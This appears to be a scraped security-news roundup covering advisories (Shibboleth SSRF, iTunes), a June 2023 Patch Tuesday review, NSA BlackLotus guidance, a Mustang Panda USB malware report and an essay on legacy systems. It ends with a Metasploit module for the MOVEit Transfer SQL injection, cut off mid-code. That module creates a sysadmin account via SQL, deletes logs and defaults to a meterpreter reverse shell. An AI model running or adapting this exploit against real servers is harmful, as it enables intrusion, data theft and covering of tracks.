Categories: News
Tags: week

Tags:  security

A list of topics we covered in the week of June 19 to June 25 of 2023



(Read more...)




The post A week in security (June 19 - 25) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows Antivirus

Mac Antivirus

iPhone Antivirus

Android Antivirus

Free Antivirus

VPN App (All Devices)

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (June 19 - 25)

Shibboleth XMLTooling before 3.2.4, as used in OpenSAML and Shibboleth Service Provider, allows SSRF via a crafted KeyInfo element. (This is fixed in, for example, Shibboleth Service Provider 3.4.1.3 on Windows.)

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Shibboleth Service Provider Security Advisory \[12 June 2023\] An updated version of the XMLTooling library that is part of the OpenSAML and Shibboleth Service Provider software is now available which corrects a server-side request forgery (SSRF) vulnerability. Parsing of KeyInfo elements can cause remote resource access. ============================================================= Including certain legal but "malicious in intent" content in the KeyInfo element defined by the XML Signature standard will result in attempts by the SP's shibd process to dereference untrusted URLs. While the content of the URL must be supplied within the message and does not include any SP internal state or dynamic content, there is at minimum a risk of denial of service, and the attack could be combined with others to create more serious vulnerabilities in the future. This issue is \*not\* specific to the V3 XMLTooling software and is believed to impact all versions prior to V3.2.4. Recommendations =============== Update to V3.2.4 or later of the XMLTooling library, which is now available. Note that on Linux and similar platforms, upgrading this component will require restarting the shibd process to correct the bug. The updated version of the library has been included in a V3.4.1.3 patch release of the Service Provider software on Windows. Other Notes =========== The xmltooling git commit containing the fix for this issue is 6080f6343f98fec085bc0fd746913ee418cc9d30 and may be in general terms applicable to V2 of the library. Credits ======= Juriën de Jong, an independent security researcher in the Netherlands URL for this Security Advisory: https://shibboleth.net/community/advisories/secadv\_20230612.txt -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE3KoVAHvtneaQzZUjN4uEVAIneWIFAmSHDk4ACgkQN4uEVAIn eWKdwg/9H2DoBB5xU53ZkNPHQW2MLHvhT/EKXp+1TfL1YD6fpqBrsY1A4pJmwamA U/PRkEGV7EitP0AJZ+lWxJoMcDupu8wsPh2nm0MJUUcgkuYdD38/ixyLs1HQ4jwT SMDQsfTDlEZvbMqdr7B20HxzIGU/bX8pxgvkP1IyclfiSOBIPdbDOQG3OvdZYl5u aJv0mACkPkiH1/JbRI9ODm3zYpwe8C2vpPyBhNrOARB9QzdogN2zx7l5xDyUiHtC YJHWnSMUEn9xvZJUTS+dHZpCmh2R3cpxmbL7WsT5xHq/LH7UUXELwcOiCgUNQgDn rz5lwF2FpXKw4qQ8u49Emqjb9pqPOD+OT1gRc/j3oibqINQunmrdjWt4m8MAK6Bh eS4S3zjGw7JNfaO91PV2TYypYf6hSqGemQBlCmnVHTZqVf068S87ZpFyG1F/VRB5 voEbdoOMBVGpeaan8snRoQTHEMG/tUdlmL7g076NvExH8W9dmhcWW/SiP/gWQ8ko NdUKfqYxONOBCDOlBzC9lBk6D106qbcCsnInwBHdPvWlX36M56oZU/DjV/lNMK+Y j2HS3DtBWxX+1nsrg/DLzyi+8ULOqbawyOqCaaolVjZzTOHGFwpd35XYblyb3iwb JbpmuRuk5cHGTwlHwXNI/5FzECOOe4KMLUzvrgzSiTWU89XBQ1M= =XkeU -----END PGP SIGNATURE-----

CVE-2023-36661

Hello everyone! This episode will be about Microsoft Patch Tuesday for June 2023, including vulnerabilities that were added between May and June Patch Tuesdays. As usual, I use my open source Vulristics project to analyse and prioritize vulnerabilities. I took the comments about the vulnerabilities from the Qualys, Tenable, Rapid7, ZDI Patch Tuesday reviews. This time there […]

Hello everyone! This episode will be about Microsoft Patch Tuesday for June 2023, including vulnerabilities that were added between May and June Patch Tuesdays.

Microsoft Patch Tuesday June 2023

As usual, I use my open source Vulristics project to analyse and prioritize vulnerabilities. I took the comments about the vulnerabilities from the Qualys, Tenable, Rapid7, ZDI Patch Tuesday reviews. This time there were only 2 vulnerabilities used in attacks or with a public exploit. And only one of them is more or less relevant.

    $ cat comments_links.txt 
    ZDI|THE JUNE 2023 SECURITY UPDATE REVIEW|https://www.thezdi.com/blog/2023/6/13/the-june-2023-security-update-review
    Qualys|Microsoft Patch Tuesday, June 2023 Security Update Review|https://blog.qualys.com/vulnerabilities-threat-research/2023/06/13/microsoft-patch-tuesday-june-2023-security-update-review
    
    $ python3 vulristics.py --report-type "ms_patch_tuesday_extended" --mspt-year 2023 --mspt-month "June" --mspt-comments-links-path "comments_links.txt"  --rewrite-flag "True"
    ...
    Creating Patch Tuesday profile...
    MS PT Year: 2023
    MS PT Month: June
    MS PT Date: 2023-06-13
    MS PT CVEs found: 78
    Ext MS PT Date from: 2023-05-10
    Ext MS PT Date to: 2023-06-12
    Ext MS PT CVEs found: 22
    ALL MS PT CVEs: 100
    ...

*   All vulnerabilities: 100
*   Urgent: 0
*   Critical: 1
*   High: 39
*   Medium: 55
*   Low: 5

Let’s see the TOP of the Vulristics report:

1.  **Memory Corruption** – Microsoft Edge (CVE-2023-3079). Exploitation in the wild is mentioned on Vulners (cisa\_kev object), AttackerKB websites. This is a type confusion bug in Chrome that could lead to code execution at the level of the logged-on user. It’s also the second type of confusion bug in Chrome actively exploited this year. Definitely make sure your Chromium-based browsers (including Edge) are up to date.
2.  **Remote Code Execution** – GitHub (CVE-2023-29007). GitHub, of course, was patched a long time ago. This is a git vulnerability and it is critical because there is a public exploit. The existence of a publicly available exploit is mentioned on Vulners website. If your organization uses Git, it’s a good reason to update it. Although this is not directly related to Microsoft Patch Tuesday.

I would also like to draw attention to another vulnerability with a public exploit:

1.  **Spoofing** – Microsoft OneNote (CVE-2023-33140). Exploitation requires the user to open a specially crafted file in an affected version of Microsoft OneNote and then click on a specially crafted URL.

For 10 vulnerabilities, the existence of exploits was indicated in CVSS Temporal Metrics (“Proof-of-Concept Exploit”):

1.  **Remote Code Execution** – .NET (CVE-2023-33128, CVE-2023-29331).
2.  **Denial of Service** – .NET (CVE-2023-32030, CVE-2023-29331)
3.  **Denial of Service** – Yet Another Reverse Proxy (YARP) (CVE-2023-33141)
4.  **Elevation of Privilege** – Windows Authentication (CVE-2023-29364)
5.  **Elevation of Privilege** – .NET (CVE-2023-33135, CVE-2023-32032)
6.  **Information Disclosure** – Visual Studio (CVE-2023-33139, CVE-2023-33144)

Now let’s look at some of the other vulnerabilities for which there were no exploits or signs of exploitation in the wild:

1.  **Remote Code Execution** – Windows Pragmatic General Multicast (PGM) (CVE-2023-29363, CVE-2023-32014, CVE-2023-32015). Pragmatic General Multicast (PGM), a.k.a. ‘reliable multicast,’ is a scalable receiver-reliable protocol. PGM allows receivers to detect loss, request retransmission of lost data, or notify an application of unrecoverable loss. PGM is best suited for applications that require duplicate-free multicast data delivery from multiple sources to multiple receivers. A remote, unauthenticated attacker could exploit these flaws by sending a malicious file to a vulnerable target. Microsoft’s mitigation guidance states that for a system to be vulnerable, it must have message queueing services enabled.
2.  **Remote Code Execution** – Microsoft Exchange (CVE-2023-32031, CVE-2023-28310). CVE-2023-32031 was discovered by ZDI researcher Piotr Bazydło and is a bypass of both CVE-2022-41082 and CVE-2023-21529. The former was listed as being under active exploit. The specific flaw exists within the Command class. The issue results from the lack of proper validation of user-supplied data, which can result in the deserialization of untrusted data. An authenticated attacker may use the vulnerability to trigger malicious code in the context of the server’s account through a network call. Successful exploitation could lead to executing code with SYSTEM privileges. CVE-2023-28310 allows an authenticated attacker to perform remote code execution on the affected system with the help of a PowerShell remoting session. An attacker must be connected to the same internet as the Exchange server to exploit the vulnerability. 
3.  **Elevation of Privilege** – Microsoft SharePoint (CVE-2023-29357). This bug was one of the bugs chained together during the Pwn2Own Vancouver contest held back in March. A remote, unauthenticated attacker can exploit the vulnerability by sending a spoofed JWT authentication token to a vulnerable server giving them the privileges of an authenticated user on the target. According to the advisory, no user interaction is required in order for an attacker to exploit this flaw. Microsoft also provides mitigation guidance for the vulnerability that says users that use Microsoft Defender in their SharePoint Server farm(s) and have AMSI enabled are not affected. “Exploitation More Likely” according to Microsoft’s Exploitability Index.

Full Vulristics report: ms\_patch\_tuesday\_june2023

Hi! My name is Alexander and I am a Vulnerability Management specialist. You can read more about me here. Currently, the best way to follow me is my Telegram channel @avleonovcom. I update it more often than this site. If you haven’t used Telegram yet, give it a try. It’s great. You can discuss my posts or ask questions at @avleonovchat.

А всех русскоязычных я приглашаю в ещё один телеграмм канал @avleonovrus, первым делом теперь пишу туда.

Microsoft Patch Tuesday June 2023: Edge type confusion, Git RCE, OneNote Spoofing, PGM RCE, Exchange RCE, SharePoint EoP

It's unclear why the NSA issued in-depth mitigation guidance for the software boot threat now, but orgs should take steps to harden their environments.

The US National Security Agency (NSA) is urging systems administrators to go beyond patching in order to protect Windows 10 and 11 machines from the BlackLotus bootkit malware.

BlackLotus burst on the scene last fall when it was spotted for sale on the Dark Web for $5,000. It has the dubious distinction of being the first in-the-wild malware to successfully bypass to Microsoft's Unified Extensible Firmware Interface (UEFI) Secure Boot protections.

UEFI is the firmware that's responsible for the booting-up routine, so it loads before the operating system kernel and any other software. BlackLotus — a software, not a firmware threat, it should be noted — takes advantage of two vulnerabilities in the UEFI Secure Boot function to insert itself into the earliest phase of the software boot process initiated by UEFI: CVE-2022-21894, aka Baton Drop, CVSS score 4.4; and CVE-2023-24932, CVSS score 6.7. These were patched by Microsoft in January 2022 and May 2023 respectively.

But the country's top technology intelligence division warned that applying the available Windows 10 and Windows 11 patches is only a "a good first step."

"Patches were not issued to revoke trust in unpatched boot loaders via the Secure Boot Deny List Database (DBX)," according to a BlackLotus mitigation guide (PDF) released by the NSA this week. "Administrators should not consider the threat fully remediated as boot loaders vulnerable to Baton Drop are still trusted by Secure Boot."

That means that bad actors can simply replace fully patched boot loaders with legitimate but vulnerable versions in order to execute BlackLotus on compromised endpoints. It's an issue that Microsoft is addressing with a more comprehensive fix planned for release in early 2024, but until then, the NSA recommends that infrastructure owners take additional steps to harden their systems, such as tightening up user executable policies, and monitoring the integrity of the boot partition. An optional advanced mitigation is to customize the Secure Boot policy by adding DBX records to all Windows endpoints.

"Protecting systems against BlackLotus is not a simple fix," said NSA platform security analyst Zachary Blum, in the advisory.

And indeed, the advisory offers extensive hardening advice, but fully implementing the NSA's guidance is a process unto itself, notes John Gallagher, vice president of Viakoo Labs.

"Given the manual nature of NSA's guidance, many organizations will find that they don't have the resources needed to fully remediate this vulnerability. Additional measures like use of network access control and traffic analysis should also be used until Microsoft can provide a more complete fix," he says.

**BlackLotus, A First-of-its-Kind Bootkit**

Executing malware like BlackLotus does offer cyberattackers several significant advantages, including ensuring persistence even after OS reinstalls and hard drive replacements. And, because the bad code executes in kernel mode ahead of security software, it's undetectable by standard defenses like BitLocker and Windows Defender (and can indeed turn them off entirely). It also can control and subvert every other program on the machine and can load additional stealthy malware that will execute with root privileges.

"UEFI vulnerabilities, as the guidance from NSA shows, are particularly difficult to mitigate and remediate because they are in the earliest stage of software and hardware interactions," says Gallagher. "The guidance NSA is providing is critically important as a reminder to pay attention to boot-level vulnerabilities and have a method to address them."

It all sounds pretty dire — an assessment of which many systems administrators agree. But as the NSA noted, most security teams are confused about how to combat the danger that the bootkit poses.

"Some organizations use terms like 'unstoppable,' 'unkillable,' and 'unpatchable' to describe the threat," according to the NSA guidance. "Other organizations believe there is no threat, due to patches that Microsoft released in January 2022 and early 2023 for supported versions of Windows. The risk exists somewhere between both extremes."

The NSA didn't provide an explanation for why it's issuing the guidance now — i.e., it didn't issue information about recent mass exploitation efforts or in-the-wild incidents. But John Bambenek, principal threat hunter at Netenrich, notes that the NSA piping up at all should indicate that BlackLotus is a threat that requires attention.

"Whenever the NSA releases a tool or guidance, the most important information is what they aren't saying," he says. "They took the time and effort to develop this tool, declassify it, and release it. They will never say why, but the reason was worth a significant diversion from how they usually operate by saying nothing."

NSA: BlackLotus BootKit Patching Won't Prevent Compromise

By Waqas
The malware campaign has been attributed to the Chinese APT group Mustang Panda, also known as Camaro Dragon.
This is a post from HackRead.com Read the original post: Chinese Espionage Malware Targets European Healthcare via USB Drives

**It all started when an employee attending an Asian conference unknowingly introduced malware to their organization in Europe by sharing a presentation with a colleague using a compromised USB drive.**

According to a report by Check Point Research (CPR), a recent surge in new versions of Chinese espionage malware has raised concerns as they rapidly propagate through infected USB drives.

The malware campaign was discovered during an investigation into an attack on a healthcare institution in Europe, shedding light on the activities of the Chinese threat actor known as **Mustang Panda**, also known as TA416, Red Lich, Earth Preta, HoneyMyte, and Bronze President, Camaro Dragon and LuminousMoth.

It is worth noting that earlier in March of this year, Mustang Panda was observed using a new **MQsTTang backdoor** against government and political organizations across Asia and Europe.

While Mustang Panda has historically focused on Southeast Asian nations, this incident has unveiled their expanded global reach. The attack initially gained access to the institution’s systems through an infected USB drive.

An employee, who had attended a conference in Asia, unknowingly shared a presentation with a colleague using the **compromised USB drive,** thus introducing the malware into the organization upon their return to Europe.

The malware, as stated in CPR’s **blog post**, by part of the “SSE” toolset previously reported by Avast, employs a malicious Delphi launcher stored on the infected USB flash drive. Once executed, it deploys a main backdoor and spreads the infection to other connected drives.

One particularly potent variant of the malware, named WispRider, employs the HopperTick launcher to propagate through USB drives. Notably, it includes a bypass mechanism specifically designed to evade **SmadAV**, a popular antivirus software in Southeast Asia.

To enhance its evasion capabilities, the malware utilizes DLL-sideloading techniques, leveraging components from security software and prominent gaming companies. This multi-pronged approach enables the malware to establish backdoors on compromised machines while simultaneously infecting newly connected removable drives, potentially infiltrating isolated systems and granting access to a wide range of entities beyond the primary targets.

The CPR advisory serves as a timely warning following the company’s recent identification of a separate attack vector attributed to the Mustang Panda. The ongoing activities of this Chinese threat actor highlight the critical need for organizations to **remain vigilant against evolving cyber threats** and maintain robust security measures, especially when handling external storage devices like USB drives.

The technical research on this growing threat is **available here**.

**RELATED ARTICLES**

1.  Hackers mailing USB drives to spread ransomware, FBI
2.  Hackers sending malware USBs with Best Buy Gift Cards
3.  US Military Targeted by Unsolicited Malicious Smartwatches
4.  New malware tool steals files from airgapped PCs using USBs
5.  USB Wormable Raspberry Robin Malware Hits Windows Installer
6.  VictoryGate cryptominer infected 35,000 devices via USB drives

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Chinese Espionage Malware Targets European Healthcare via USB Drives

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 16 and June 23. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for June 16 to June 23

A logic issue was addressed with improved checks. This issue is fixed in iTunes 12.12.9 for Windows. An app may be able to elevate privileges

This document describes the security content of iTunes 12.12.9 for Windows.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**iTunes 12.12.9 for Windows**

Released May 23, 2023

**iTunes**

Available for: Windows 10 and later

Impact: An app may be able to elevate privileges

Description: A logic issue was addressed with improved checks.

CVE-2023-32353: Zeeshan Shaikh (@bugzzzhunter) – Synopsys Cybersecurity Research Center (CyRC)

**iTunes**

Available for: Windows 10 and later

Impact: An app may be able to gain elevated privileges

Description: A logic issue was addressed with improved checks.

CVE-2023-32351: ycdxsb of VARAS@IIE

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: May 23, 2023

CVE-2023-32353: About the security content of iTunes 12.12.9 for Windows

For line-of-business execs, the fear of grinding mission-critical systems to a halt overrides the fear of ransomware. How can CISOs overcome this?

Dirk Hodgson, the director of cybersecurity for NTT Australia, tells a story. He once worked with a company that did scientific measurements. The highly specialized firm used highly specialized equipment, and one large piece of equipment cost them $2 million when purchased years ago.

The hardware did not cause any issues, and the manufacturer routinely replaced parts and performed maintenance, as per their contract. The security problem was the operating system, which was Windows XP. The company went to the manufacturer and asked if it could upgrade the OS to a current and supported OS.

Not a problem, replied the manufacturer. The company merely has to buy a new multimillion-dollar system, and that will come with a current OS. As for updating the OS on the current machine? The manufacturer declined.

"That thousand-dollar upgrade would require a multimillion-dollar investment," Hodgson says. "Legacy software is definitely a big problem."

For decades, security executives have battled legacy systems. The fight has gotten more intense as the threat landscape has grown more complicated, tangled up in remote workers, partners, IoT, and cloud integrations. There are many technological ways to try to mitigate the legacy threat — isolation, virtualization, replication in a sandbox, etc. — but none of those deal with corporate politics and the fear of letting security teams touch legacy systems at all.

**Uptime Issues Take Priority for Line-of-Business**

The issues with legacy systems fall into two distinct buckets: cybersecurity issues and uptime issues. For the line-of-business (LOB) executive, the uptime issue — the fear that touching anything in the legacy environment could cause the system to crash — is far more frightening. And because these legacy systems usually operate quite well day to day, the business executive sees zero reason to toy with them.

The LOB also often legitimately worries that they won't have the capabilities to restore the system if it does crash because the people who wrote the code are long gone, the vendor who manufactured the hardware may no longer be in business, and the documentation for the software is either nonexistent or woefully inadequate.

Worst of all, legacy systems are often truly mission-critical, such as those running assembly lines. Those systems crashing could easily halt production for an indeterminate period, and worse, could trigger cascading failures across connected systems.

"The big surprise about legacy systems is that since they have been around for so long, almost everything else is connected to them," says Michael Smith, field CTO at Vercara. "So you have this huge Gordian knot of dependencies that make it nearly impossible to upgrade or decommission that legacy system, and you have to do a lot of network and log analysis to understand what other systems are connecting to them and when."

**Bubble Wrap Doesn't Work for Everything**

"Business executives are right to be cautious when allowing security teams to touch mission-critical legacy systems," says Eoin Hinchy, founder and CEO of Tines. "Security teams should instead focus on reducing the attack surface area of legacy systems. In other words, wrap them in bubble wrap."

Although the bubble-wrap concept is a popular means of dealing with legacy, it doesn't always work. And therein lies the real conundrum. Not only does this effort still sometimes fail, but there is no reliable way of predicting such a failure.

"One of the challenges with legacy is that is an accumulation of a technical debt that amasses over time," says David Burg, cybersecurity leader for Ernst & Young Americas. "When they were built, (developers) were working with the institutional knowledge that existed at that time. The documentation of architecture, interoperability, and dependencies and such were likely never documented. People come and go."

Beyond the traditional security risks, NTT Australia's Hodgson points out that system certification is another complicating factor. "A system is certified to a particular level. If patched, there is a reasonable chance that it will work fine, but you might lose that accreditation that you bought," he says.

And many of these specialized systems are physically difficult to replace even if the LOB chooses to do so. "Consider medical facilities installing MRI machines. They have to be craned in, you have to install lead in the walls," Hodgson says. "You are going to be keeping that for a very long time."

**What CISOs Want**

This brings the debate to a conflict between ideal and practical. From the board/CEO/CISO perspective, the ideal would be to replace all of the legacy systems with modernized systems that can effortlessly support today's cybersecurity and compliance requirements. But even if the enterprise is willing to spend the money to make that switch, it may simply not be practical.

"For many legacy system applications, data access, calculation, and even communications performance cannot be easily matched in a PC environment, if at all," says Bob Hansmann, senior product marketing manager for security at Infoblox. "The work to migrate/rewrite Cobol, Fortran, RPG II, and other applications to PC platforms is mountainous and hard to cost-justify. And even if the code is migrated, it needs to be heavily tested and modified for performance — as in speed and accuracy — often due to how different PC hardware is from mainframe and mini hardware."

The lack of actionable documentation is a critical factor in updating legacy systems, but the problem is not limited to legacy. Today's developers — whether it's a software vendor creating apps for wide distribution or an enterprise developer creating homegrown software — still do not document code in any usable way. Thus, the next generation of legacy systems may suffer from the same problems.

**Build Documentation Into Future Legacy**

Ayman Al Issa, the industrial cybersecurity lead at McKinsey, labels the lack of actionable documentation today "a major issue."

"We don't see good documentation at all," he says. "It's a cultural issue. They don't see the value of documentation. This includes maintenance issues and any change to the system. They are simply not documented. People are lazy about documenting everything."

Al Issa suggests that companies need to create their own documentation based on the teams managing the systems. But to avoid the single-point-of-failure problem, "they need to do a rotation of duties so that there's not only one person who can operate the systems," he says.

In theory, management should insist that proper documentation happen, but instead, managers are pressured to deliver. Once the developer completes Project A, do they insist that the developer spend a week documenting everything, or do they tell the developer to move onto the next project, which is what the developer wants to do anyway?

Burg says the only viable fix is to incorporate strong document requirements into the DevSecOps process: "We have to make this contemporaneous documentation or it won't happen."

Why Legacy System Users Prioritize Uptime Over Security

This Metasploit module exploits an SQL injection vulnerability in the MOVEit Transfer web application that allows an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker can leverage an information leak be able to upload a .NET deserialization payload.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(      update_info(        info,        'Name' => 'MOVEit SQL Injection vulnerability',        'Description' => %q{          This module exploits an SQL injection vulnerability in the MOVEit Transfer web application          that allows an unauthenticated attacker to gain access to MOVEit Transfer’s database.          Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an          attacker can leverage an information leak be able to upload a .NET deserialization payload.        },        'License' => MSF_LICENSE,        'Author' => [          'sfewer-r7', # PoC https://github.com/sfewer-r7/CVE-2023-34362          'rbowes-r7', # research          'bwatters-r7' # module        ],        'References' => [          ['CVE', '2023-34362' ],          ['URL', 'https://github.com/sfewer-r7/CVE-2023-34362'],          ['URL', 'https://attackerkb.com/topics/mXmV0YpC3W/cve-2023-34362/rapid7-analysis'],          ['URL', 'https://www.wiz.io/blog/cve-2023-34362']        ],        'Platform' => 'win',        'Arch' => [ARCH_CMD],        'Payload' => {          'Space' => 345        },        'Targets' => [          [            'Windows Command',            {              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp',                'RPORT' => 443,                'SSL' => true              }            }          ],        ],        'DisclosureDate' => '2023-05-31',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'Reliability' => [ REPEATABLE_SESSION ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]        }      )    )    register_options(      [        Msf::OptString.new('TARGET_URI', [ false, 'Target URI', '/api/v1/token']),        Msf::OptString.new('USERNAME', [ true, 'Username', Rex::Text.rand_text_alphanumeric(5..11)]),        Msf::OptString.new('LOGIN_NAME', [ true, 'Login Name', Rex::Text.rand_text_alphanumeric(5..11)]),        Msf::OptString.new('PASSWORD', [ true, 'Password', Rex::Text.rand_text_alphanumeric(5..11)])      ]    )    @moveit_token = nil    @moveit_instid = nil    @guest_email_addr = "#{Rex::Text.rand_text_alphanumeric(5..12)}@#{Rex::Text.rand_text_alphanumeric(3..6)}.com"    @uploadfile_name = Rex::Text.rand_text_alphanumeric(8..15)    @uploadfile_size = rand(5..64)    @uploadfile_data = Rex::Text.rand_text_alphanumeric(@uploadfile_size)    @user_added = false    @files_json = nil  end  def begin_file_upload(folders_json, token_json)    boundary = rand_text_numeric(27)    post_data = "--#{boundary}\r\n"    post_data << "Content-Disposition: form-data; name=\"name\"\r\n\r\n#{@uploadfile_name}\r\n--#{boundary}\r\n"    post_data << "Content-Disposition: form-data; name=\"size\"\r\n\r\n#{@uploadfile_size}\r\n--#{boundary}\r\n"    post_data << "Content-Disposition: form-data; name=\"comments\"\r\n\r\n\r\n--#{boundary}--\r\n"    res = send_request_raw({      'method' => 'POST',      'uri' => normalize_uri("/api/v1/folders/#{folders_json['items'][0]['id']}/files?uploadType=resumable"),      'headers' => {        'Content-Type' => 'multipart/form-data; boundary=' + boundary,        'Authorization' => "Bearer #{token_json['access_token']}"      },      'connection' => 'close',      'accept' => '*/*',      'data' => post_data.to_s    })    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't post API files #1 (#{files_response.body})") if res.nil? || res.code != 200    files_json = res.get_json_document    vprint_status("Initiated resumable file upload for fileId '#{files_json['fileId']}'...")    files_json  end  def check    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri('moveitisapi/moveitisapi.dll?action=capa'),      'connection' => 'close',      'accept' => '*/*'    })    version = nil    if res && res.code == 200 && res.headers.key?('X-MOVEitISAPI-Version')      version = Rex::Version.new(res.headers['X-MOVEitISAPI-Version'])      # 2020.1.x AKA 12.1.x      return Exploit::CheckCode::Appears if version >= Rex::Version.new('12.1.0') && version < Rex::Version.new('12.1.10')      # 2021.0.x AKA 13.0.x      return Exploit::CheckCode::Appears if version >= Rex::Version.new('13.0.0') && version < Rex::Version.new('13.0.8')      # 2021.1.x AKA 13.1.x      return Exploit::CheckCode::Appears if version >= Rex::Version.new('13.1.0') && version < Rex::Version.new('13.1.6')      # 2022.0.x AKA 14.0.x      return Exploit::CheckCode::Appears if version >= Rex::Version.new('14.0.0') && version < Rex::Version.new('14.0.6')      # 2022.1.x AKA 14.1.x      return Exploit::CheckCode::Appears if version >= Rex::Version.new('14.1.0') && version < Rex::Version.new('14.1.7')      # 2023.0.x AKA 15.0.x      return Exploit::CheckCode::Appears if version >= Rex::Version.new('15.0.0') && version < Rex::Version.new('15.0.3')    else      return Exploit::CheckCode::Safe    end    return Exploit::CheckCode::Unknown  end  def cleanup    cleanup_user(@files_json) if @user_added    super  end  def cleanup_user(files_json)    hax_username = datastore['USERNAME']    hax_loginname = datastore['LOGIN_NAME']    deleteuser_payload = [      "DELETE FROM moveittransfer.fileuploadinfo WHERE FileID='#{files_json['fileId']}'", # delete the deserialization payload      "DELETE FROM moveittransfer.files WHERE UploadUsername='#{hax_username}'", # delete the file we uploaded      "DELETE FROM moveittransfer.activesessions WHERE Username='#{hax_username}'", #      "DELETE FROM moveittransfer.users WHERE Username='#{hax_username}'", # delete the user account we created      "DELETE FROM moveittransfer.log WHERE Username='#{hax_username}'", # The web ASP stuff logs by username      "DELETE FROM moveittransfer.log WHERE Username='#{hax_loginname}'", # The API logs by loginname      "DELETE FROM moveittransfer.log WHERE Username='Guest:#{@guest_email_addr}'", # The SQLi generates a guest log entry.    ]    if @user_added      vprint_status("Deleting user #{hax_username}")      sqli(sqli_payload(deleteuser_payload))      @user_added = false    end  end  def create_sysadmin    hax_username = datastore['USERNAME']    hax_password = datastore['PASSWORD']    hax_loginname = datastore['LOGIN_NAME']    createuser_payload = [      "UPDATE moveittransfer.hostpermits SET Host='*.*.*.*' WHERE Host!='*.*.*.*'",      "INSERT INTO moveittransfer.users (Username) VALUES ('#{hax_username}')",      "UPDATE moveittransfer.users SET LoginName='#{hax_loginname}' WHERE Username='#{hax_username}'",      "UPDATE moveittransfer.users SET InstID='#{@moveit_instid}' WHERE Username='#{hax_username}'",      "UPDATE moveittransfer.users SET Password='#{makev1password(hax_password, Rex::Text.rand_text_alphanumeric(4))}' WHERE Username='#{hax_username}'",      "UPDATE moveittransfer.users SET Permission='40' WHERE Username='#{hax_username}'",      "UPDATE moveittransfer.users SET CreateStamp=NOW() WHERE Username='#{hax_username}'",    ]    res = sqli(sqli_payload(createuser_payload))    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't perform initial SQLi (#{res.body})") if res.code != 200    @user_added = true  end  def encrypt_deserialization_gadget(gadget, org_key)    org_key = org_key.gsub(' ', '')    org_key = [org_key].pack('H*').bytes.pack('C*')    deserialization_gadget = moveitv2encrypt(gadget, org_key)    deserialization_gadget  end  def find_folder_id(token_json)    folders_response = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri('/api/v1/folders'),      'connection' => 'close',      'accept' => '*/*',      'headers' => {        'Authorization' => "Bearer #{token_json['access_token']}"      }    })    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't get API folders (#{folders_response.body})") if folders_response.nil? || folders_response.code != 200    folders_json = JSON.parse(folders_response.body)    vprint_status("Found folderId '#{folders_json['items'][0]['id']}'.")    folders_json  end  def get_csrf_token(res)    fail_with(Msf::Exploit::Failure::Unknown, 'No csrf token, or my code is bad') unless res.to_s.split(/\n/).join =~ /.*csrftoken" value="([a-f0-9]*)"/    ::Regexp.last_match(1)  end  def guestaccess_request(body)    res = send_request_cgi({      'method' => 'POST',      'keep_cookies' => true,      'uri' => normalize_uri('guestaccess.aspx'),      'connection' => 'close',      'accept' => '*/*',      'vars_post' => body    })    res  end  # Perform a request to the ISAPI endpoint with an arbitrary transaction  def isapi_request(transaction, headers)    send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri('moveitisapi/moveitisapi.dll?action=m2'),      'keep_cookies' => true,      'connection' => 'close',      'accept' => '*/*',      'headers' => {        'X-siLock-Test': 'abcdX-SILOCK-Transaction: folder_add_by_path',        'X-siLock-Transaction': transaction      }.merge(headers)    })  end  def leak_encryption_key(token_json, files_json)    haxleak_payload = [      # The \ gets escaped, so we leverage CHAR_LENGTH(39) to get the key we want (Standard Networks\siLock\Institutions\0) as all other KeyName's will be longer (Standard Networks\siLock\Institutions\1234)      "UPDATE moveittransfer.files SET UploadAgentBrand=(SELECT PairValue 